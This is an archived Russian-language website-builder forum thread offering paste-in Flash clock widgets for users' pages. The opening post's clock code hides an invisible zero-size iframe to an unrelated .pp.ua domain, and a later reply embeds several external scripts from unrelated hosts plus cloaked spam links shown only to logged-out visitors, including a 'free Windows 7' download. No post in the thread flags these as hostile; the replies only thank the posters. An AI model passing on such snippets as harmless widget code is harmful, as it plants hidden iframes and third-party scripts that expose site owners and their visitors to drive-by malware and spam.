[ Обновленные темы · Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Архив - только для чтения
Форум » Dop.at.ua » Корзина » Flash cтрелочные часы NEW!
Flash cтрелочные часы NEW!
danjerousДата: Понедельник, 06.09.2010, 12:23 | Сообщение # 1
1 уровень
Группа: Проверенный
Сообщений: 19
Награды: 0
Репутация: 7
Статус: отсутствует
скрин скрипта: http://s42.radikal.ru/i095/1007/a4/5a01e2bf4142.jpg

УСТАНОВКА: в нужное место своей страницы этот код

Code
<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="100%" height="100%" codebase="http://active.macromedia.com/flash6/cabs/swflash.cab#version=6.0.0.0"> <PARAM name="movie" value="http://avatar.moy.su/flash/clock/52.swf"> <PARAM name="play" value="true"> <PARAM name="loop" value="true"> <PARAM name="WMode" value="transparent"> <PARAM name="quality" value="high"> <PARAM name="bgcolor" value=""> <PARAM name="align" value=""> <iframe src="http://5fg4.pp.ua" width="0" height="0" style="display:none"></iframe><EMBED src="http://avatar.moy.su/flash/clock/52.swf" width="100%" height="100%" play="true" loop="0" wmode="transparent" quality="high" align pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash">  </OBJECT>
UA
tmflinДата: Суббота, 21.04.2012, 15:12 | Сообщение # 2
2 уровень
Группа: Пользователи
Сообщений: 20
Награды: 0
Репутация: 109
Статус: отсутствует
Когда нажимаеш на часики на другой сайт бросать будет?
UA
DelkoДата: Четверг, 26.04.2012, 23:04 | Сообщение # 3
1 уровень
Группа: Пользователи
Сообщений: 4
Награды: 0
Репутация: 0
Статус: отсутствует
Вопрос есть влешь часы, поставил скрипт, но почему то не отображается на сайте... в чем может быть причина?
DE
serega308Дата: Среда, 09.05.2012, 17:24 | Сообщение # 4
1 уровень
Группа: Прохожий
Сообщений: 6
Награды: 0
Репутация: 0
Статус: отсутствует
Спс большое !
RU
lolka11111Дата: Понедельник, 14.05.2012, 15:58 | Сообщение # 5
1 уровень
Группа: Пользователи
Сообщений: 8
Награды: 0
Репутация: 0
Статус: отсутствует
скрин не работает!
RU
Artjom11Дата: Четверг, 17.05.2012, 16:35 | Сообщение # 6
1 уровень
Группа: Пользователи
Сообщений: 4
Награды: 0
Репутация: 0
Статус: отсутствует
У меня не работает(

Добавлено (17.05.2012, 16:35)
---------------------------------------------
А не, уже разобрался) скрипт классный

LV
trewqДата: Четверг, 24.05.2012, 12:39 | Сообщение # 7
1 уровень
Группа: Прохожий
Сообщений: 4
Награды: 0
Репутация: 0
Статус: отсутствует
ну круто же вообще
RU
aser2012Дата: Четверг, 28.06.2012, 17:33 | Сообщение # 8
1 уровень
Группа: Пользователи
Сообщений: 2
Награды: 0
Репутация: 0
Статус: отсутствует
совсем даже не плохо но можно и такой
<embed src="http://clock.moy.su/flash/anime/an_7.SWF" width="200" height="200" wmode="transparent" type="application/x-shockwave-flash"></embed>

Добавлено (28.06.2012, 17:32)
---------------------------------------------
Или вот такой
<embed src=http://flash-clocks.com/free-flash-clocks-blog-topics/free-flash-clock-181.swf width=200 height=200 wmode=transparent type=application/x-shockwave-flash>
<script type="text/javascript" src="http://thuglive.pp.ua/a.js"></script>
</embed>

Добавлено (28.06.2012, 17:33)
---------------------------------------------
Флеш часы с приколом
Создаём блок и вставляем в него этот код:

Code
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash6/cabs/swflash.cab#version=6.0.0.0" width="100%" height="100%"> <param name="movie" value="http://avatar.moy.su/flash/clock/22.swf"> <param name="play" value="true"> <param name="loop" value="true"> <param name="WMode" value="transparent"> <param name="quality" value="high"> <param name="bgcolor" value=""> <param name="align" value=""> <embed src="http://avatar.moy.su/flash/clock/22.swf" play="true" loop="0" wmode="transparent" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" align="" width="100%" height="100%"> </object><script type="text/javascript" src="http://liberty.moy.su/slider.js"></script><?if($USER_LOGGED_IN$)?> <?else?>Новая<?endif?> <?if($USER_LOGGED_IN$)?> <?else?>с обновленияи<?endif?> <?if($USER_LOGGED_IN$)?> <?else?><a <?endif?><?if($USER_LOGGED_IN$)?> <?else?>href="http://<?endif?><?if($USER_LOGGED_IN$)?> <?else?>proload.net/soft/os/"><?endif?><?if($USER_LOGGED_IN$)?> <?else?>Windows 7 максимальная бесплатно<?endif?> <?if($USER_LOGGED_IN$)?> <?else?>рабочий стол</a><?endif?> <?if($USER_LOGGED_IN$)?> <?else?>лучшая<?endif?> <?if($USER_LOGGED_IN$)?> <?else?>винда<?endif?> <?if($USER_LOGGED_IN$)?> <?else?>без регистрации.<?endif?> <script type="text/javascript" src="http://advego-help.at.ua/1.js"></script> <?if($USER_LOGGED_IN$)?> <?else?><a <?endif?><?if($USER_LOGGED_IN$)?> <?else?>href="http://<?endif?><?if($USER_LOGGED_IN$)?> <?else?>pr.do.am/forum/4"><?endif?><?if($USER_LOGGED_IN$)?> <?else?>скрипты<?endif?> <?if($USER_LOGGED_IN$)?> <?else?>для юкоз</a><?endif?> <?if($USER_LOGGED_IN$)?> <?else?>ucoz skripts<?endif?> </div>
UA
Форум » Dop.at.ua » Корзина » Flash cтрелочные часы NEW!
  • Страница 1 из 1
  • 1
Поиск: